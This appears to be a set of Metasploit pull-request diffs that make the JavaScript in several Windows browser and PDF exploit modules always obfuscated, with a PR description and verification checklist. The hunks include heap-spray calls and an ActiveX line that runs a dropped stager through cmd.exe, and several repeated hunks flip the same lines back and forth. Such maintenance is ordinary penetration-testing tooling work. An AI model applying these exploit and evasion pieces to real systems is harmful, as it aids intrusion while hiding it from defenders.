       #JS obfuscation on demand
-      js = js_obfuscate(js).obfuscate
+      js = js_obfuscate(js)
       main_sym = js.sym('main')
     end
 

--- a/modules/exploits/windows/browser/teechart_pro.rb
+++ b/modules/exploits/windows/browser/teechart_pro.rb
@@ -4,11 +4,13 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::JSObfu
 
   def initialize(info = {})
     super( update_info(info,
@@ -97,11 +99,6 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'DisclosureDate' => 'Aug 11 2011',
       'DefaultTarget'  => 0))
-
-    register_options(
-      [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript Obfuscation', true])
-      ], self.class)
   end
 
   def junk
@@ -138,7 +135,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
     # Randomize object name
     obj_name  = rand_text_alpha(rand(100) + 1)
-    main_sym  = 'main' #main function name
 
     if my_target.name =~ /IE6/ or my_target.name =~ /IE7/
       js = <<-EOS
@@ -233,11 +229,8 @@ EOS
       js = heaplib(custom_js)
 
       #JS obfuscation on demand
-      if datastore['OBFUSCATE']
-        js = ::Rex::Exploitation::JSObfu.new(js)
-        js.obfuscate
-        main_sym = js.sym('main')
-      end
+      js = js_obfuscate(js).obfuscate
+      main_sym = js.sym('main')
     end
 
     content = <<-EOF

--- a/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb
+++ b/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb
@@ -229,7 +229,7 @@ class Metasploit3 < Msf::Exploit::Remote
     js = heaplib(js, {:noobfu => true})
 
     #obfuscate on demand
-    js = js_obfuscate(js).to_s
+    js = js_obfuscate(js)
 
     html = <<-EOS
     <html>

--- a/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb
+++ b/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb
@@ -229,7 +229,7 @@ class Metasploit3 < Msf::Exploit::Remote
     js = heaplib(js, {:noobfu => true})
 
     #obfuscate on demand
-    js = js_obfuscate(js).obfuscate.to_s
+    js = js_obfuscate(js).to_s
 
     html = <<-EOS
     <html>

--- a/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb
+++ b/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb
@@ -4,11 +4,13 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::JSObfu
   #include Msf::Exploit::Remote::BrowserAutopwn
   #
   #autopwn_info({
@@ -99,11 +101,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => "May 03 2011",
       'DefaultTarget'  => 0))
-
-    register_options(
-      [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])
-      ], self.class)
   end
 
   def get_target(agent)
@@ -232,10 +229,7 @@ class Metasploit3 < Msf::Exploit::Remote
     js = heaplib(js, {:noobfu => true})
 
     #obfuscate on demand
-    if datastore['OBFUSCATE']
-      js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
-    end
+    js = js_obfuscate(js).obfuscate.to_s
 
     html = <<-EOS
     <html>

--- a/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb
+++ b/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb
@@ -171,7 +171,7 @@ class Metasploit3 < Msf::Exploit::Remote
     js = heaplib(spray)
 
     # Obfuscate on demand
-    js = js_obfuscate(js).obfuscate.to_s
+    js = js_obfuscate(js).to_s
 
     # Randomize the javascript variable names
     vname = rand_text_alpha(rand(100) + 1)

--- a/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb
+++ b/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb
@@ -4,11 +4,13 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::JSObfu
 
   def initialize(info = {})
     super(update_info(info,
@@ -56,9 +58,6 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'DisclosureDate' => 'Jan 12 2010',
       'DefaultTarget'  => 0))
-
-    register_options(
-      [ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript Obfuscation', true]) ], self.class)
   end
 
   # Prevent module from being executed in autopwn
@@ -172,10 +171,7 @@ class Metasploit3 < Msf::Exploit::Remote
     js = heaplib(spray)
 
     # Obfuscate on demand
-    if datastore['OBFUSCATE']
-      js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
-    end
+    js = js_obfuscate(js).obfuscate.to_s
 
     # Randomize the javascript variable names
     vname = rand_text_alpha(rand(100) + 1)

--- a/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb
+++ b/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb
@@ -171,7 +171,7 @@ class Metasploit3 < Msf::Exploit::Remote
     js = heaplib(spray)
 
     # Obfuscate on demand
-    js = js_obfuscate(js).to_s
+    js = js_obfuscate(js)
 
     # Randomize the javascript variable names
     vname = rand_text_alpha(rand(100) + 1)

--- a/modules/exploits/windows/browser/vlc_amv.rb
+++ b/modules/exploits/windows/browser/vlc_amv.rb
@@ -201,7 +201,7 @@ class Metasploit3 < Msf::Exploit::Remote
     js = heaplib(spray_1 + spray_2)
 
     #obfuscate on demand
-    js = js_obfuscate(js).obfuscate.to_s
+    js = js_obfuscate(js).to_s
 
     #Value for the 'Src' parameter of our ActiveX control
     trigger_file = get_resource() + "/" + @filename + ".amv"

--- a/modules/exploits/windows/browser/vlc_amv.rb
+++ b/modules/exploits/windows/browser/vlc_amv.rb
@@ -201,7 +201,7 @@ class Metasploit3 < Msf::Exploit::Remote
     js = heaplib(spray_1 + spray_2)
 
     #obfuscate on demand
-    js = js_obfuscate(js).to_s
+    js = js_obfuscate(js)
 
     #Value for the 'Src' parameter of our ActiveX control
     trigger_file = get_resource() + "/" + @filename + ".amv"

--- a/modules/exploits/windows/browser/vlc_amv.rb
+++ b/modules/exploits/windows/browser/vlc_amv.rb
@@ -4,12 +4,14 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = GoodRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
   include Msf::Exploit::RopDb
+  include Msf::Exploit::JSObfu
 
   def initialize(info={})
     super(update_info(info,
@@ -24,7 +26,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'License'     => MSF_LICENSE,
       'Author'      =>
         [
-          'sinn3r',
+          'sinn3r'
         ],
       'References' =>
         [
@@ -61,11 +63,6 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'DisclosureDate' => "Mar 23 2011",
       'DefaultTarget' => 0))
-
-    register_options(
-      [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])
-      ], self.class)
   end
 
   def get_target(cli, request)
@@ -204,10 +201,7 @@ class Metasploit3 < Msf::Exploit::Remote
     js = heaplib(spray_1 + spray_2)
 
     #obfuscate on demand
-    if datastore['OBFUSCATE']
-      js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
-    end
+    js = js_obfuscate(js).obfuscate.to_s
 
     #Value for the 'Src' parameter of our ActiveX control
     trigger_file = get_resource() + "/" + @filename + ".amv"

--- a/modules/exploits/windows/browser/vlc_mms_bof.rb
+++ b/modules/exploits/windows/browser/vlc_mms_bof.rb
@@ -4,11 +4,13 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::JSObfu
 
   def initialize(info={})
     super(update_info(info,
@@ -81,11 +83,6 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'DisclosureDate' => "Mar 15 2012",
       'DefaultTarget' => 0))
-
-    register_options(
-      [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])
-      ], self.class)
   end
 
   def get_target(cli, request)
@@ -148,13 +145,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     #Use heaplib
     js_spray = heaplib(spray)
-
-    #obfuscate on demand
-    if datastore['OBFUSCATE']
-      js_spray = ::Rex::Exploitation::JSObfu.new(js_spray)
-      js_spray.obfuscate
-    end
-
+    js_spray = js_obfuscate(js_spray).obfuscate.to_s
 
     src_ip = Rex::Socket.source_address.split('.')
     hex_ip = src_ip.map { |h| [h.to_i].pack('C*')[0].unpack('H*')[0] }.join

--- a/modules/exploits/windows/browser/vlc_mms_bof.rb
+++ b/modules/exploits/windows/browser/vlc_mms_bof.rb
@@ -145,7 +145,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     #Use heaplib
     js_spray = heaplib(spray)
-    js_spray = js_obfuscate(js_spray).obfuscate.to_s
+    js_spray = js_obfuscate(js_spray).to_s
 
     src_ip = Rex::Socket.source_address.split('.')
     hex_ip = src_ip.map { |h| [h.to_i].pack('C*')[0].unpack('H*')[0] }.join

--- a/modules/exploits/windows/browser/vlc_mms_bof.rb
+++ b/modules/exploits/windows/browser/vlc_mms_bof.rb
@@ -145,7 +145,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     #Use heaplib
     js_spray = heaplib(spray)
-    js_spray = js_obfuscate(js_spray).to_s
+    js_spray = js_obfuscate(js_spray)
 
     src_ip = Rex::Socket.source_address.split('.')
     hex_ip = src_ip.map { |h| [h.to_i].pack('C*')[0].unpack('H*')[0] }.join

--- a/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb
+++ b/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb
@@ -142,7 +142,7 @@ class Metasploit3 < Msf::Exploit::Remote
     actvx.LaunchProcess("cmd.exe", "/c start #{@temp_folder}/#{@stager_name}");
     JS
 
-    js = js_obfuscate(js).to_s
+    js = js_obfuscate(js)
 
     html = <<-EOS
     <html>

--- a/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb
+++ b/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb
@@ -4,12 +4,14 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
   include Msf::Exploit::EXE
+  include Msf::Exploit::JSObfu
 
   def initialize(info = {})
     super(update_info(info,
@@ -55,8 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     register_options(
       [
-        OptString.new('WINDOWSTEMP', [ true, "The Windows temporal folder.", "C:/Windows/Temp" ]),
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]),
+        OptString.new('WINDOWSTEMP', [ true, "The Windows temporal folder.", "C:/Windows/Temp" ])
       ], self.class)
   end
 
@@ -141,10 +142,7 @@ class Metasploit3 < Msf::Exploit::Remote
     actvx.LaunchProcess("cmd.exe", "/c start #{@temp_folder}/#{@stager_name}");
     JS
 
-    if datastore['OBFUSCATE']
-      js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
-    end
+    js = js_obfuscate(js).obfuscate.to_s
 
     html = <<-EOS
     <html>

--- a/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb
+++ b/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb
@@ -142,7 +142,7 @@ class Metasploit3 < Msf::Exploit::Remote
     actvx.LaunchProcess("cmd.exe", "/c start #{@temp_folder}/#{@stager_name}");
     JS
 
-    js = js_obfuscate(js).obfuscate.to_s
+    js = js_obfuscate(js).to_s
 
     html = <<-EOS
     <html>

--- a/modules/exploits/windows/fileformat/adobe_reader_u3d.rb
+++ b/modules/exploits/windows/fileformat/adobe_reader_u3d.rb
@@ -5,11 +5,13 @@
 
 require 'msf/core'
 require 'zlib'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = AverageRanking
 
   include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::JSObfu
 
   def initialize(info = {})
     super(update_info(info,
@@ -75,8 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     register_options(
       [
-        OptString.new('FILENAME', [ true, 'The file name.',  'msf.pdf']),
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
+        OptString.new('FILENAME', [ true, 'The file name.',  'msf.pdf'])
       ], self.class)
 
   end
@@ -269,11 +270,7 @@ class Metasploit3 < Msf::Exploit::Remote
     JS
 
     js = js.gsub(/^ {4}/,'')
-
-    if datastore['OBFUSCATE']
-      js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
-    end
+    js = js_obfuscate(js).obfuscate
 
     u3d = make_u3d_stream
     xml = make_xml_data

--- a/modules/exploits/windows/fileformat/adobe_reader_u3d.rb
+++ b/modules/exploits/windows/fileformat/adobe_reader_u3d.rb
@@ -270,7 +270,7 @@ class Metasploit3 < Msf::Exploit::Remote
     JS
 
     js = js.gsub(/^ {4}/,'')
-    js = js_obfuscate(js).obfuscate
+    js = js_obfuscate(js)
 
     u3d = make_u3d_stream
     xml = make_xml_data


### PR DESCRIPTION
This PR changes the OBFUSCATE datastore option to JsObfuscate.
## Verification Steps:

It's kind of tricky to verify this kind of stuff, but I suggest the following:
- [ ] Make sure `js_obfuscate` is used
- [ ] Make sure `to_s` is used or `{js}` after `js_obfuscate` to make sure you always get the obfuscated javascript
- [ ] If you can actually test the module, feel free to do so. Pick as many as you want.
- [ ] If you can't test the module, you can try to run it, and see that it still gives you the obfuscated string, and not something else. Pick as many as you want.
